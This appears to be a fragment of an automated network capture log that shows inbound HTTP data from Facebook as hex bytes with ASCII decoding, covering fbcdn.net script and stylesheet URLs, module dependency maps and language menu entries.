                                                                                    2023-02-07 18:46:27 UTC1457INData Raw: 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 73 6a 38 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 78 6c 4d 22 7d 2c 22 31 37 32 32 30 31 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 5f 4d 35 67 70 63 36 52 4c 72 48 6a 63 4c 74 4d 22 7d 2c 22 31 37 37 38 33 30 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 35 66 69 73 5a 68 6d 63 32 58 39 32 45 70 43 30 22 7d 2c 22 31 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 38 4f 6f 22 7d 2c
                                                                                    Data Ascii: ,"hash":"AT5aetN5Gb3reIXVsj8"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBUxlM"},"1722014":{"result":false,"hash":"AT6_M5gpc6RLrHjcLtM"},"1778302":{"result":false,"hash":"AT65fisZhmc2X92EpC0"},"1840809":{"result":false,"hash":"AT5nYctoTsr7alRi8Oo"},
                                                                                    2023-02-07 18:46:27 UTC1459INData Raw: 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 37 78 30 77 78 65 62 53 4e 78 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 42 6e 62 61 6a 53 37 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 2d 5c 2f 72 5c 2f 71 75 39 76 69 2d 62 6d 57 6c 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 78 54 6d 6c 4c 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e
                                                                                    Data Ascii: fbcdn.net\/rsrc.php\/v3\/yg\/r\/7x0wxebSNxQ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"BnbajS7":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/r\/qu9vi-bmWl3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"sxTmlLO":{"type":"js","src":"https:\/\/static.xx.fbcdn.n
                                                                                    2023-02-07 18:46:27 UTC1460INData Raw: 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 35 48 37 38 43 34 79 2d 50 70 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 76 32 52 71 37 4e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 62 5c 2f 72 5c 2f 43 44 42 57 71 65 52 66 35 71 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 79 53 65 57 37 48 67 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22
                                                                                    Data Ascii: e":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/5H78C4y-PpG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Yv2Rq7N":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yb\/r\/CDBWqeRf5qh.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ySeW7Hg":{"type":"js"
                                                                                    2023-02-07 18:46:27 UTC1462INData Raw: 32 36 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 74 76 37 71 44 2b 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 34 58 62 4b 31 48 50 31 47 4c 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 39 5a 69 72 31 75 38 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 64 42 71 34 5c 2f 79 47 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 73 32 78
                                                                                    Data Ascii: 26l.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Mtv7qD+":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/4XbK1HP1GLb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"9Zir1u8":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3idBq4\/yG\/l\/en_US\/s2x
                                                                                    2023-02-07 18:46:27 UTC1463INData Raw: 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 32 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6d 34 73 45 6b 4e 7a 31 39 35 4d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 34 79 4a 57 6b 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 32 5c 2f 72 5c 2f 73 6f 79 48 6e 74 58 58 58 6f 31 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 71 43 4f 71 4e 70 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c
                                                                                    Data Ascii: static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/l\/0,cross\/m4sEkNz195M.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"64yJWkL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/r\/soyHntXXXo1.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"sqCOqNp":{"type":"js","src":"https:\
                                                                                    2023-02-07 18:46:27 UTC1465INData Raw: 77 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 7a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 7a 52 44 73 5f 61 56 57 47 67 68 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 30 51 72 44 74 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 54 51 79 34 5c 2f 79 35 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 2d 38 70 4b 32 44 34 73 4a 64 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a
                                                                                    Data Ascii: wq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/l\/0,cross\/zRDs_aVWGgh.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"Y0QrDtL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTQy4\/y5\/l\/en_US\/-8pK2D4sJdb.js?_nc_x=Ij3Wp8lg5Kz
                                                                                    2023-02-07 18:46:27 UTC1466INData Raw: 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 75 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 45 58 4c 42 73 69 30 37 5a 32 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 55 77 6c 31 72 2b 41 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 72 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 67 51 48 38 43 68 6d 35 50 55 61 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 6a 52 78 47 78 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69
                                                                                    Data Ascii: rsrc.php\/v3iLl54\/yu\/l\/en_US\/EXLBsi07Z2u.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Uwl1r+A":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yr\/l\/0,cross\/gQH8Chm5PUa.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"FjRxGxP":{"type":"js","src":"https:\/\/stati
                                                                                    2023-02-07 18:46:27 UTC1468INData Raw: 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 67 5f 5f 65 56 35 4f 58 53 58 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 33 7a 68 73 44 6d 55 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 62 5c 2f 72 5c 2f 4f 68 31 53 69 38 64 51 61 46 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a
                                                                                    Data Ascii: ","nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/g__eV5OXSXl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"3zhsDmU":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yb\/r\/Oh1Si8dQaFn.js?_nc_x=Ij3Wp8lg5Kz","nc":
                                                                                    2023-02-07 18:46:27 UTC1469INData Raw: 36 6b 70 52 4b 63 22 2c 22 43 55 70 44 4d 65 31 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 4f 4d 22 3a 7b 22 72 22 3a 5b 22 6d 73 4d 63 64 31 30 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 63 36 6b 70 52 4b 63 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53 75 62 6d 69 74 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37
                                                                                    Data Ascii: 6kpRKc","CUpDMe1","msMcd10","BnbajS7","Kk81m1Y"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"DOM":{"r":["msMcd10","BnbajS7","Kk81m1Y"],"be":1},"Form":{"r":["c6kpRKc","msMcd10","5p9Jgd9","BnbajS7","Kk81m1Y"],"be":1},"FormSubmit":{"r":["foz7
                                                                                    2023-02-07 18:46:27 UTC1471INData Raw: 2c 22 54 4b 7a 6d 76 56 46 22 2c 22 68 48 41 6a 50 50 6e 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 6d 4f 32 52 55 6f 47 22 2c 22 4a 4d 49 59 71 41 63 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 33 34 6d 43 46 42 77 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 46 66 34 34 6f 52 47 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 67 6f 49 43 31 36 6a 22 2c 22 70 56 6a 32 4c 78 74 22 2c 22 35 45 58 57 58 69 47 22 2c 22 41 4d 73 32 54 65 5c 2f 22 2c 22 64 32 55 49 31 77 71 22 2c 22 59 30 51 72 44 74 4c 22 2c 22 68 47 53 42 6d 42 58 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 2b 48 76 64 62 55 6f 22 2c 22 79 53 65 57 37 48 67 22 2c 22 48 56 34 65 30 64 74 22 2c 22 41 6a 72 70 33 6e 33 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 32 50 34 70 71 6e 5a 22 2c 22 48
                                                                                    Data Ascii: ,"TKzmvVF","hHAjPPn","kOEHvpu","msMcd10","mO2RUoG","JMIYqAc","e9ANzw\/","34mCFBw","TjYa5zM","Ff44oRG","CGkH4FY","goIC16j","pVj2Lxt","5EXWXiG","AMs2Te\/","d2UI1wq","Y0QrDtL","hGSBmBX","5p9Jgd9","+HvdbUo","ySeW7Hg","HV4e0dt","Ajrp3n3","Kk81m1Y","2P4pqnZ","H
                                                                                    2023-02-07 18:46:27 UTC1472INData Raw: 58 57 58 69 47 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 79 53 65 57 37 48 67 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 59 76 32 52 71 37 4e 22 2c 22 37 54 56 58 70 4f 79 22 2c 22 45 77 45 77 71 49 33 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 48 6f 76 65 72 63 61 72 64 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37 6e 77 37 22 2c 22 49 46 45 66 4e 4d 6c 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 34 44 78 73 6d 66 55 22 2c 22 43 55 70 44 4d 65 31 22 2c 22 64 4b 50 4a 62 71 4a 22 2c 22 58 61 67 66 70 4e 43 22 2c 22 52 56 6a 4d 51 36 41 22 2c 22 4a 35 68 34 77 4a 73 22 2c
                                                                                    Data Ascii: XWXiG","5p9Jgd9","ySeW7Hg","Kk81m1Y","BnbajS7","Yv2Rq7N","7TVXpOy","EwEwqI3"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"Hovercard":{"r":["foz7nw7","IFEfNMl","R5w1rCJ","c6kpRKc","4DxsmfU","CUpDMe1","dKPJbqJ","XagfpNC","RVjMQ6A","J5h4wJs",
                                                                                    2023-02-07 18:46:27 UTC1473INData Raw: 39 22 2c 22 79 53 65 57 37 48 67 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 59 76 32 52 71 37 4e 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 51 75 69 63 6b 53 61 6e 64 53 6f 6c 76 65 72 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37 6e 77 37 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 43 55 70 44 4d 65 31 22 2c 22 38 45 4c 43 42 77 48 22 2c 22 78 32 32 4f 62 79 34 22 2c 22 53 57 78 33 79 4e 76 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 33 7a 68 73 44 6d 55 22 2c 22 58 6d 30 52 68 34 52 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59
                                                                                    Data Ascii: 9","ySeW7Hg","Kk81m1Y","BnbajS7","Yv2Rq7N","7TVXpOy"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"QuickSandSolver":{"r":["foz7nw7","c6kpRKc","CUpDMe1","8ELCBwH","x22Oby4","SWx3yNv","msMcd10","3zhsDmU","Xm0Rh4R","5p9Jgd9","BnbajS7","Kk81m1Y
                                                                                    2023-02-07 18:46:27 UTC1475INData Raw: 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 47 72 61 79 54 65 78 74 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 54 47 65 73 41 30 61 22 2c 22 49 46 45 66 4e 4d 6c 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 54 4b 7a 6d 76 56 46 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 35 45 58 57 58 69 47 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 59 76 32 52 71 37 4e 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 44 69 61 6c 6f 67 58 22 3a 7b 22 72 22 3a 5b 22 63 36 6b 70 52 4b 63 22 2c 22 34 44 78 73 6d 66 55 22 2c 22 7a 5c 2f 41 4f 4d 42 6d 22 2c 22 64 4b 50 4a 62 71 4a 22 2c 22 58 61 67 66 70 4e 43 22 2c 22 4a 35 68 34 77 4a 73 22 2c 22 30 37 49 69 57
                                                                                    Data Ascii: "FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"XUIGrayText.react":{"r":["TGesA0a","IFEfNMl","R5w1rCJ","TKzmvVF","TjYa5zM","5EXWXiG","BnbajS7","Yv2Rq7N","7TVXpOy"],"be":1},"DialogX":{"r":["c6kpRKc","4DxsmfU","z\/AOMBm","dKPJbqJ","XagfpNC","J5h4wJs","07IiW
                                                                                    2023-02-07 18:46:27 UTC1476INData Raw: 45 45 64 57 66 38 32 4b 4e 44 57 79 41 4f 6b 43 4b 6d 38 70 53 70 57 65 77 52 4b 4f 5f 67 58 58 39 38 4b 59 57 42 52 6c 6e 36 6c 45 4d 68 48 4a 38 46 55 51 65 66 4b 42 4e 55 51 22 2c 22 6c 69 6e 6b 73 68 69 6d 5f 68 6f 73 74 22 3a 22 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 2c 22 6c 69 6e 6b 73 68 69 6d 5f 70 61 74 68 22 3a 22 5c 2f 6c 2e 70 68 70 22 2c 22 6c 69 6e 6b 73 68 69 6d 5f 65 6e 63 5f 70 61 72 61 6d 22 3a 22 68 22 2c 22 6c 69 6e 6b 73 68 69 6d 5f 75 72 6c 5f 70 61 72 61 6d 22 3a 22 75 22 2c 22 75 73 65 5f 72 65 6c 5f 6e 6f 5f 6f 70 65 6e 65 72 22 3a 66 61 6c 73 65 2c 22 61 6c 77 61 79 73 5f 75 73 65 5f 68 74 74 70 73 22 3a 74 72 75 65 2c 22 6f 6e 69 6f 6e 5f 61 6c 77 61 79 73 5f 73 68 69 6d 22 3a 74 72 75 65 2c 22 6d 69 64 64 6c 65 5f 63 6c
                                                                                    Data Ascii: EEdWf82KNDWyAOkCKm8pSpWewRKO_gXX98KYWBRln6lEMhHJ8FUQefKBNUQ","linkshim_host":"l.facebook.com","linkshim_path":"\/l.php","linkshim_enc_param":"h","linkshim_url_param":"u","use_rel_no_opener":false,"always_use_https":true,"onion_always_shim":true,"middle_cl
                                                                                    2023-02-07 18:46:27 UTC1478INData Raw: 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 73 53 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 69 76 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 79 62 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 7a 72 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 42 63 22 2c 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 2c 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 5d 2c 5b 5b 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 69 64 5f 49 44 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49
                                                                                    Data Ascii: _3310c079_0_r_sS","__markup_3310c079_0_s_iv","__markup_3310c079_0_t_yb","__markup_3310c079_0_u_zr","__markup_3310c079_0_v_Bc","XUIMenuWithSquareCorner","XUIMenuTheme"],[[{"class":"headerItem","value":"id_ID","selected":false,"ctor":{"__m":"MenuSelectableI
                                                                                    2023-02-07 18:46:27 UTC1479INData Raw: 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 66 72 5f 46 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 59 31 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22
                                                                                    Data Ascii: )","title":"","className":"headerItem"},{"class":"headerItem","value":"fr_FR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_7_Y1"},"label":"Fran\u00e7ais (France)","title":"","className":"headerItem"},{"class":"
                                                                                    2023-02-07 18:46:27 UTC1481INData Raw: 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 42 66 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 50 6f 72 74 75 67 61 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 72 6f 5f 52 4f 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 61 37
                                                                                    Data Ascii: tem"},"markup":{"__m":"__markup_3310c079_0_e_Bf"},"label":"Portugu\u00eas (Portugal)","title":"","className":"headerItem"},{"class":"headerItem","value":"ro_RO","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_f_a7
                                                                                    2023-02-07 18:46:27 UTC1482INData Raw: 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 72 75 5f 52 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 34 38 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 34 32 30 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 61 5c 75 30 34 33 38 5c 75 30 34 33 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d
                                                                                    Data Ascii: le":"","className":"headerItem"},{"class":"headerItem","value":"ru_RU","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_m_48"},"label":"\u0420\u0443\u0441\u0441\u043a\u0438\u0439","title":"","className":"headerItem
